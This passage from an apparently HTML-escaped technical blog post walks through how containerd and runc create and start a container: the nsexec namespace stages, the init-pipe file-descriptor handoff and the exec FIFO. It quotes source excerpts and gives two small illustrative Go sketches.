## decoded: .. &amp;quot;ociVersion&amp;quot;:&amp;quot;1.3.0&amp;quot;,&amp;quot;process&amp;quot;:{&amp;quot;terminal&amp;quot;:true,&amp;quot;consoleSize&amp;quot;:{&amp;quot;height&amp;quot;:50,&amp;quot;width&amp;quot;:212}, ...&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.3. Create Bundle &amp;amp; Spawn shim Daemon&lt;/h4&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ctr.NewTask()&lt;/code&gt; ends up as a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/containerd.services.tasks.v1.Tasks/Create&amp;quot;&lt;/code&gt; request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The handler &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Create()&lt;/code&gt; first gets the container object from the boltdb &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meta.db&lt;/code&gt; [1] and sets up the create options [2]. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rtime.Create()&lt;/code&gt; is called with these options [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// plugins/services/tasks/local.go
func (l *local) Create(ctx context.Context, r *api.CreateTaskRequest, _ ...grpc.CallOption) (*api.CreateTaskResponse, error) {
    container, err := l.getContainer(ctx, r.ContainerID) // [1]
    // [...]
    opts := runtime.CreateOpts{ // [2]
        Spec: container.Spec,
        IO: runtime.IO{
            Stdin:    r.Stdin,
            Stdout:   r.Stdout,
            Stderr:   r.Stderr,
            Terminal: r.Terminal,
        },
        // [...]
        Runtime:         container.Runtime.Name,
        // [...]
    }
    // [...]
    rtime := l.v2Runtime
    c, err := rtime.Create(ctx, r.ContainerID, opts) // [3]
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Inside &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Create()&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;NewBundle()&lt;/code&gt; is called to create the runtime container directories and files [4]. Later, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;m.manager.Start()&lt;/code&gt; [5] spawns a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd-shim-runc-v2&lt;/code&gt; process as the container shim daemon. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;shimTask.Create()&lt;/code&gt; [6] sends a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CreateTaskRequest&lt;/code&gt; to the shim daemon, which in turn executes the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create --bundle &amp;lt;bundle_dir&amp;gt;&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// core/runtime/v2/task_manager.go
func (m *TaskManager) Create(ctx context.Context, taskID string, opts runtime.CreateOpts) (_ runtime.Task, retErr error) {
    // [...]
    bundle, err := NewBundle(ctx, m.root, m.state, taskID, opts.Spec) // [4]
    shim, err := m.manager.Start(ctx, taskID, bundle, opts) // [5]
    shimTask, err := newShimTask(shim)
    // [...]
    t, err := func() (runtime.Task, error) {
        t, err := shimTask.Create(ctx, opts) // [6]
        // [...]
    }()
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The OCI config file is created in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;NewBundle()&lt;/code&gt; with the path &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/run/containerd/io.containerd.runtime.v2.task/&amp;lt;namespace&amp;gt;/&amp;lt;id&amp;gt;/config.json&amp;quot;&lt;/code&gt; [7].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// core/runtime/v2/bundle.go
func NewBundle(ctx context.Context, root, state, id string, spec typeurl.Any) (b *Bundle, err error) {
    // [...]
    ns, err := namespaces.NamespaceRequired(ctx) // ns == &amp;quot;moby&amp;quot;
    b = &amp;amp;Bundle{
        ID:        id,
        Path:      filepath.Join(state, ns, id), // state == &amp;quot;/run/containerd/io.containerd.runtime.v2.task/&amp;quot;
                                                 // id == &amp;quot;&amp;lt;container id&amp;gt;&amp;quot;
        // [...]
    }
    // [...]
    if spec != nil {
        if spec := spec.GetValue(); spec != nil {
            // [...]
            specPath := filepath.Join(b.Path, oci.ConfigFilename)
            err = os.WriteFile(specPath, spec, 0666) // [7]
        }
    }
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The arguments of the command executed by the shim daemon to create a container consist of the global part (before &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;create&lt;/code&gt;) and the sub-command part (after &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;create&lt;/code&gt;). The actual command line looks like:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/usr/bin/runc \
--root /var/run/docker/runtime-runc/moby \
--log /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json \
--log-format json \
--systemd-cgroup \
create \
--bundle /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5 \
--pid-file /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/init.pid \
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.4. Enter the Container&lt;/h4&gt;&lt;p&gt;In the final step, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tsk.Start()&lt;/code&gt; is called to send a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/containerd.services.tasks.v1.Tasks/Start&amp;quot;&lt;/code&gt; request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;, whose handler is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Start()&lt;/code&gt; in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;local.go&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;This function first looks up the running task [1] and then sends a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;StartRequest&lt;/code&gt; to the shim daemon to start the container [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// plugins/services/tasks/local.go
func (l *local) Start(ctx context.Context, r *api.StartRequest, _ ...grpc.CallOption) (*api.StartResponse, error) {
    t, err := l.getTask(ctx, r.ContainerID) // [1]
    // [...]
    p := runtime.Process(t)
    // [...]
    if err := p.Start(ctx); err != nil { // &amp;lt;--------
        // [...]
    }
    // [...]
}

// core/runtime/v2/shim.go
func (s *shimTask) Start(ctx context.Context) error {
    _, err := s.task.Start(ctx, &amp;amp;task.StartRequest{ // [2]
        ID: s.ID(),
    })
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;On the shim daemon side, the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc start &amp;lt;id&amp;gt;&lt;/code&gt; is executed to unblock the init process that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt; left parked just before &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;execve()&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The actual command line looks like:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/usr/bin/runc \
--root /var/run/docker/runtime-runc/moby \
--log /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json \
--log-format json \
--systemd-cgroup \
start \
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h2&gt;2. Runc Internal&lt;/h2&gt;&lt;p&gt;Here, we try to understand how &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt; loads the container by reviewing the source code.&lt;/p&gt;&lt;h3&gt;2.1. Cmd: create&lt;/h3&gt;&lt;p&gt;The “create” command is handled by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;startContainer()&lt;/code&gt;. It indirectly calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;start()&lt;/code&gt;, which first calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;createExecFifo()&lt;/code&gt; [1] to create a FIFO file and then builds the init command by calling &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;newParentProcess()&lt;/code&gt; [2]. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parent.start()&lt;/code&gt; is called to execute &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// create.go
var createCommand = &amp;amp;cli.Command{
    Name:  &amp;quot;create&amp;quot;,
    Action: func(_ context.Context, cmd *cli.Command) error {
        // [...]
        status, err := startContainer(cmd, CT_ACT_CREATE, nil) // &amp;lt;--------
        // [...]
    },
}

// libcontainer/container_linux.go
func (c *Container) start(process *Process) (retErr error) {
    if process.Init {
        // [...]
        if err := c.createExecFifo(); err != nil { // [1]
            return err
        }
        // [...]
    }

    // [...]
    parent, err := c.newParentProcess(process) // [2]

    if err := parent.start(); err != nil { // [3]
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;newParentProcess()&lt;/code&gt; prepares the command line for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/proc/self/fd/&amp;lt;runc_fd&amp;gt; init&lt;/code&gt;. The command and process information are wrapped into an &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initProcess&lt;/code&gt; object and returned [4].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/container_linux.go
func (c *Container) newParentProcess(p *Process) (parentProcess, error) {
    else {
        // [...]
        safeExe, err = exeseal.CloneSelfExe(c.stateDir)
        // [...]
        exePath = &amp;quot;/proc/self/fd/&amp;quot; + strconv.Itoa(int(safeExe.Fd()))
        // [...]
    }
    cmd := exec.Command(exePath, &amp;quot;init&amp;quot;)
    cmd.Args[0] = os.Args[0]
    // [...]
    if p.Init {
        // [...]
        return c.newInitProcess(p, cmd, comm) // [4]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parent.start()&lt;/code&gt; is then called to fork a child process and execve &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; [5].&lt;/p&gt;&lt;p&gt;Now there are two processes. The child (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt;) is the one that &lt;strong&gt;enters the new namespaces&lt;/strong&gt; and &lt;strong&gt;sets up the container environment&lt;/strong&gt; from the inside, such as mounting the filesystem and applying seccomp rules. It is the same process that will &lt;strong&gt;later execve the user’s command&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;The parent stays on the host as a privileged helper, doing the things the child &lt;strong&gt;can’t do&lt;/strong&gt; once it’s inside the namespaces: applying cgroups, providing the uid/gid maps, and running host-side hooks.&lt;/p&gt;&lt;p&gt;The two coordinate over a sync socket &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;p.comm.syncSockParent&lt;/code&gt; [6]. Once the child is ready, the parent will receive the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;procReady&lt;/code&gt; event [7] and exit.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/process_linux.go
func (p *initProcess) start() (retErr error) {
    // [...]
    err := p.cmd.Start() // [5]

    // [...]
    if err := p.manager.Apply(p.pid()); err != nil { // set up cgroups
        // [...]
    }

    if err := p.createNetworkInterfaces(); err != nil {
        // [...]
    }

    if err := p.setupNetworkDevices(); err != nil {
        // [...]
    }

    if p.config.Config.HasHook(configs.CreateContainer, configs.StartContainer) {
        // [...]
    }

    ierr := parseSync(p.comm.syncSockParent /* [6] */, func(sync *syncT) error {
        switch sync.Type {
        case procMountPlease:
            // [...]
        case procSeccomp:
            // [...]
        case procReady: // [7]
            // [...]
        case procHooks:
            // [...]
        // [...]
        }
        return nil
    })
    // [...]
    return nil
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Let’s see how &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; works.&lt;/p&gt;&lt;h3&gt;2.2. Cmd: init&lt;/h3&gt;&lt;p&gt;Before looking at the “init” implementation, we have to talk about the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt; constructor.&lt;/p&gt;&lt;p&gt;A Golang binary can use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cgo&lt;/code&gt; to refer to C functions. Here, the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt; function works as a C constructor, so it is triggered before &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main()&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/nsenter/nsenter.go
/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/
import &amp;quot;C&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt; does nothing if there is no init pipe, that is, if the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;_LIBCONTAINER_INITPIPE&lt;/code&gt; environment variable is not set [1]. For &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt;, the parent process (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt;) sets this variable, so the check passes and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt; continues to run. The comment also implies the same thing.&lt;/p&gt;&lt;p&gt;The variable holds the file descriptor number of one side of the init socket pair [2], and it is set when &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt; is preparing the command line of the init process.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/container_linux.go
func (c *Container) newParentProcess(p *Process) (parentProcess, error) {
    // [...]
    cmd.ExtraFiles = append(cmd.ExtraFiles, comm.initSockChild) // [2]
    cmd.Env = append(cmd.Env,
        &amp;quot;_LIBCONTAINER_INITPIPE=&amp;quot;+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
    )
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Going back to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt;, we can see that it implements a complex multi-stage state machine to set up the isolated environment.&lt;/p&gt;&lt;p&gt;The diagram below may help you understand the whole flow.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;stage-0  (STAGE_PARENT)  // in host namespaces
        |  parse netlink bootstrap (cloneflags, uid/gid maps...)
 (child)|
 +------|  clone_parent(&amp;amp;env, STAGE_CHILD)
 |      |
 |      |  stage-1 &amp;gt;&amp;gt; SYNC_USERMAP_PLS
 |      |                                 write /proc/&amp;lt;stage-1&amp;gt;/uid_map, gid_map
 |      |  stage-1 &amp;lt;&amp;lt; SYNC_USERMAP_ACK
 |      |
 |      |
 |      |  stage-1 &amp;gt;&amp;gt; SYNC_RECVPID_PLS
 |      |                                 receives stage-2 pid, forwards up to Go
 |      |  stage-1 &amp;lt;&amp;lt; SYNC_RECVPID_ACK
 |      |  stage-1 &amp;gt;&amp;gt; SYNC_CHILD_FINISH
 |      +  exit(0)
 |
 |
 |
 +-&amp;gt; stage-1  (STAGE_CHILD) // inside several new namespaces
        |  setns(provided namespaces)
        |
        |  try_unshare(CLONE_NEWUSER)
        |  SYNC_USERMAP_PLS &amp;gt;&amp;gt; stage-0
        |  (waiting...)
        |  SYNC_USERMAP_ACK &amp;lt;&amp;lt; stage-0
        |
        |  try_unshare(config.cloneflags)
 +------|  clone_parent(&amp;amp;env, STAGE_INIT)
 |      |
 |      |  SYNC_RECVPID_PLS &amp;gt;&amp;gt; stage-0
 |      |  (waiting...)
 |      |  SYNC_RECVPID_ACK &amp;lt;&amp;lt; stage-0
 |      |  SYNC_CHILD_FINISH &amp;gt;&amp;gt; stage-0
 |      +  exit(0)
 |
 |
 |
 +-&amp;gt; stage-2  (STAGE_INIT) // inside ALL new namespaces, PID 1 in new pidns
        |  final cleanup
        +  return (and continue)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The stage-2 child is required because &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;unshare(CLONE_NEWPID)&lt;/code&gt; &lt;strong&gt;doesn’t move the calling process into the new PID namespace&lt;/strong&gt;; only children created afterwards are placed in it. That is why, after the stage-1 process has joined or created all the other namespaces with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;setns()&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;unshare()&lt;/code&gt;, it has to fork the stage-2 child process, whose pid is 1 in the new namespace.&lt;/p&gt;&lt;p&gt;On the Go side, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;init()&lt;/code&gt; is a package initializer, so it runs before &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main()&lt;/code&gt;. When the first argument is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;init&lt;/code&gt;, this function covers all init command handling, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main()&lt;/code&gt; won’t be executed afterwards. Internally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;startInitialization()&lt;/code&gt; is called to recover file descriptors, reconstruct the init configuration, and synchronize status with its parent process, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// init.go
func init() {
    if len(os.Args) &amp;gt; 1 &amp;amp;&amp;amp; os.Args[1] == &amp;quot;init&amp;quot; {
        libcontainer.Init() // &amp;lt;--------
    }
}

// libcontainer/init_linux.go
func Init() {
    // [...]
    if err := startInitialization(); err != nil { // &amp;lt;--------
        // [...]
    }
    // [...]
}
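&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The way &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;_LIBCONTAINER_INITPIPE&lt;/code&gt; carries a file descriptor number from the parent to the re-executed child can be reproduced with the Go standard library alone. The following is a minimal sketch, not runc code: the helper names &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pipeEnv&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parent&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;child&lt;/code&gt;, the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;child&lt;/code&gt; argument, and the plain pipe used in place of a socket pair are all assumptions made for illustration. It relies on the documented &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;os/exec&lt;/code&gt; behavior that entry i of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ExtraFiles&lt;/code&gt; becomes file descriptor 3+i in the child.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;package main

import (
    "fmt"
    "io"
    "os"
    "os/exec"
    "slices"
    "strconv"
)

// The variable name is the one runc uses; everything else in this file is
// a hypothetical stand-in for illustration.
const (
    envName      = "_LIBCONTAINER_INITPIPE"
    stdioFdCount = 3 // fds 0, 1 and 2 are stdin, stdout and stderr
)

// pipeEnv builds the environment entry that points at the last of n extra files.
func pipeEnv(n int) string {
    return envName + "=" + strconv.Itoa(stdioFdCount+n-1)
}

// child recovers the inherited descriptor from the environment and drains it.
func child() error {
    fd, err := strconv.Atoi(os.Getenv(envName))
    if err != nil {
        return err
    }
    pipe := os.NewFile(uintptr(fd), "init") // wrap the raw fd as a Go file
    defer pipe.Close()
    msg, err := io.ReadAll(pipe)
    if err != nil {
        return err
    }
    fmt.Printf("child: got %q on fd %d\n", msg, fd)
    return nil
}

// parent re-executes this binary as the child and hands it the read end of a pipe.
func parent() error {
    self, err := os.Executable()
    if err != nil {
        return err
    }
    r, w, err := os.Pipe()
    if err != nil {
        return err
    }
    cmd := exec.Command(self, "child")
    cmd.Stdout, cmd.Stderr = os.Stdout, os.Stderr
    cmd.ExtraFiles = append(cmd.ExtraFiles, r)
    cmd.Env = append(os.Environ(), pipeEnv(len(cmd.ExtraFiles)))
    if err := cmd.Start(); err != nil {
        return err
    }
    r.Close() // the child now holds its own copy of the read end
    fmt.Fprint(w, "hello from parent")
    w.Close() // EOF lets the child's ReadAll return
    return cmd.Wait()
}

func main() {
    run := parent
    if slices.Contains(os.Args[1:], "child") {
        run = child
    }
    if err := run(); err != nil {
        fmt.Fprintln(os.Stderr, err)
        os.Exit(1)
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;With a single extra file the variable is set to 3, so the child should report the parent’s message as read on fd 3. The same arithmetic appears in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;newParentProcess()&lt;/code&gt;, and the child side corresponds to the first lines of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;startInitialization()&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/init_linux.go (continued)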

func startInitialization() (retErr error) {
    // [...]
    envInitPipe := os.Getenv(&amp;quot;_LIBCONTAINER_INITPIPE&amp;quot;)
    initPipeFd, err := strconv.Atoi(envInitPipe)
    initPipe := os.NewFile(uintptr(initPipeFd), &amp;quot;init&amp;quot;) // use as Go file object
    // [...]
    var config initConfig
    if err := json.NewDecoder(initPipe).Decode(&amp;amp;config); err != nil {
        return err
    }
    // [...]
    return containerInit(it, &amp;amp;config, syncPipe, consoleSocket, pidfdSocket, fifoFile, logPipe)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerInit()&lt;/code&gt; handles two init types. If a new container is being created, the init type will be &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initStandard&lt;/code&gt; [1]; otherwise, when attaching to an already-running container, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initSetns&lt;/code&gt; is used [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/init_linux.go
func containerInit(t initType, config *initConfig, pipe *syncSocket, consoleSocket, pidfdSocket, fifoFile, logPipe *os.File) error {
    switch t {
    case initSetns: // [2]
        i := &amp;amp;linuxSetnsInit{
            // [...]
        }
        return i.Init()
    case initStandard: // [1]
        i := &amp;amp;linuxStandardInit{
            // [...]
        }
        return i.Init()
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;At this point, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; is still &lt;strong&gt;root&lt;/strong&gt; and has &lt;strong&gt;full privileges&lt;/strong&gt; inside the namespaces. It sets up the environment inside the container, such as network routing [3] and the filesystem [4]. Later, it calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;finalizeNamespace()&lt;/code&gt; [5] to &lt;strong&gt;drop capabilities&lt;/strong&gt;, change the working directory, and close all leaked file descriptors.&lt;/p&gt;&lt;p&gt;Before executing the entrypoint binary [6], it reopens the FIFO file write-only [7]. Opening a FIFO for writing blocks until another process opens it for reading, so &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; will &lt;strong&gt;be blocked&lt;/strong&gt; here until someone opens the same FIFO file for reading.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/standard_init_linux.go
func (l *linuxStandardInit) Init() error {
    // [...]
    if err := setupNetwork(l.config); err != nil { // [3]
        return err
    }
    // [...]
    err := prepareRootfs(l.pipe, l.config) // [4]
    // [...]
    if err := finalizeNamespace(l.config); err != nil { // [5]
        return err
    }
    // [...]
    fifoFile, err := pathrs.Reopen(l.fifoFile, unix.O_WRONLY|unix.O_CLOEXEC) // [7]
    // [...]
    name, err := exec.LookPath(l.config.Args[0])
    // [...]
    return linux.Exec(name, l.config.Args, l.config.Env) // [6]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;You can probably guess who the reader is. That’s right, it’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc start&lt;/code&gt;!&lt;/p&gt;&lt;h3&gt;2.3. Cmd: start&lt;/h3&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; is blocked and waiting for a reader, and now the status of the container is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Created&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The shim handles the start-container request by executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc start&lt;/code&gt;, and the action callback calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;container.Exec()&lt;/code&gt; [1] when the status of the container is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Created&lt;/code&gt; [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// start.go
var startCommand = &amp;amp;cli.Command{
    Name:  &amp;quot;start&amp;quot;,
    Action: func(_ context.Context, cmd *cli.Command) error {
        // [...]
        container, err := getContainer(cmd)
        // [...]
        switch status {
        case libcontainer.Created: // [2]
                // [...]
            if err := container.Exec(); err != nil { // [1]
                // [...]
            }
        // [...]
        }
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Exec()&lt;/code&gt; finally calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;handleFifo()&lt;/code&gt; [3] to open the FIFO file with read permission, which allows &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; to continue running and enter the container.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/container_linux.go
func (c *Container) Exec() error {
    // [...]
    return c.exec() // &amp;lt;--------
}
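&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The blocking that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc start&lt;/code&gt; rely on is a general property of FIFOs, so it can be tried outside of runc. Below is a minimal sketch, assuming Linux or another Unix-like system. The function name &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rendezvous&lt;/code&gt;, the temporary directory, and the payload are hypothetical choices, and a goroutine stands in for the separate &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; process.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;package main

import (
    "fmt"
    "os"
    "path/filepath"
    "sync"
    "syscall"
)

// rendezvous creates a FIFO in dir and lets two sides meet on it. The
// goroutine stands in for runc init (write-only open), the caller for
// runc start (read-only open). It returns the bytes the reader received.
func rendezvous(dir string) (string, error) {
    path := filepath.Join(dir, "exec.fifo")
    if err := syscall.Mkfifo(path, 0o600); err != nil {
        return "", err
    }

    var wg sync.WaitGroup
    wg.Add(1)
    go func() {
        defer wg.Done()
        // Opening write-only blocks until a reader opens the same FIFO.
        w, err := os.OpenFile(path, os.O_WRONLY, 0)
        if err != nil {
            return
        }
        defer w.Close()
        w.WriteString("0") // arbitrary payload for this sketch
    }()

    // Opening read-only releases the writer; ReadFile returns once the
    // writer has closed its end.
    data, err := os.ReadFile(path)
    wg.Wait()
    return string(data), err
}

func run() error {
    dir, err := os.MkdirTemp("", "fifo-demo")
    if err != nil {
        return err
    }
    defer os.RemoveAll(dir)
    got, err := rendezvous(dir)
    if err != nil {
        return err
    }
    fmt.Printf("reader received %q\n", got)
    return nil
}

func main() {
    if err := run(); err != nil {
        fmt.Fprintln(os.Stderr, err)
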